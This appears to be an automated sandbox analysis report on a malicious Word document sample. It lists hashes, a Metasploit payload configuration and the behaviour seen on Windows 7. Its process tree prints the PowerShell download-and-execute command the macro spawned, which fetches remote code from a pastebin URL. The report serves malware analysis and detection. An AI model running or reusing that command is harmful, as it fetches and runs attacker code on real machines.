Analysis
-
max time kernel
31s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
05-12-2024 21:38
Behavioral task
behavioral1
Sample
4434e5b7bbd577a0119ddbacb11744a63299646f4b61efebd83e3ef8fb75f49f.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
4434e5b7bbd577a0119ddbacb11744a63299646f4b61efebd83e3ef8fb75f49f.doc
Resource
win10v2004-20241007-en
General
-
Target
4434e5b7bbd577a0119ddbacb11744a63299646f4b61efebd83e3ef8fb75f49f.doc
-
Size
48KB
-
MD5
33ef79ab8673ac5c7c054b354592b4be
-
SHA1
cd5c58905c31753f2bc2920053b85de4835fae86
-
SHA256
4434e5b7bbd577a0119ddbacb11744a63299646f4b61efebd83e3ef8fb75f49f
-
SHA512
3e8e9572fdaa43df2a7a1ac35985e3a391c4c792db8ff87ccc1c97a14cd17c5cecb04f310f78549d7071008a9b8e73cb848ada677b232a59d4017c63e95ab9bd
-
SSDEEP
768:LRvwmGuySd63lKBrXlLNO0al7RC4nFF+p0jC+:LVtYSnr1BfiRCEF+pJ+
Malware Config
Extracted
https://pastebin.com/raw/5x1V0wCG
Extracted
metasploit
windows/exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2688 2680 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2688 powershell.exe -
pid Process 2688 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 5 pastebin.com -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2680 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2680 WINWORD.EXE 2680 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2680 wrote to memory of 2788 2680 WINWORD.EXE 30 PID 2680 wrote to memory of 2788 2680 WINWORD.EXE 30 PID 2680 wrote to memory of 2788 2680 WINWORD.EXE 30 PID 2680 wrote to memory of 2788 2680 WINWORD.EXE 30 PID 2680 wrote to memory of 2688 2680 WINWORD.EXE 31 PID 2680 wrote to memory of 2688 2680 WINWORD.EXE 31 PID 2680 wrote to memory of 2688 2680 WINWORD.EXE 31 PID 2680 wrote to memory of 2688 2680 WINWORD.EXE 31
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4434e5b7bbd577a0119ddbacb11744a63299646f4b61efebd83e3ef8fb75f49f.doc"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "IEX(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/5x1V0wCG')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-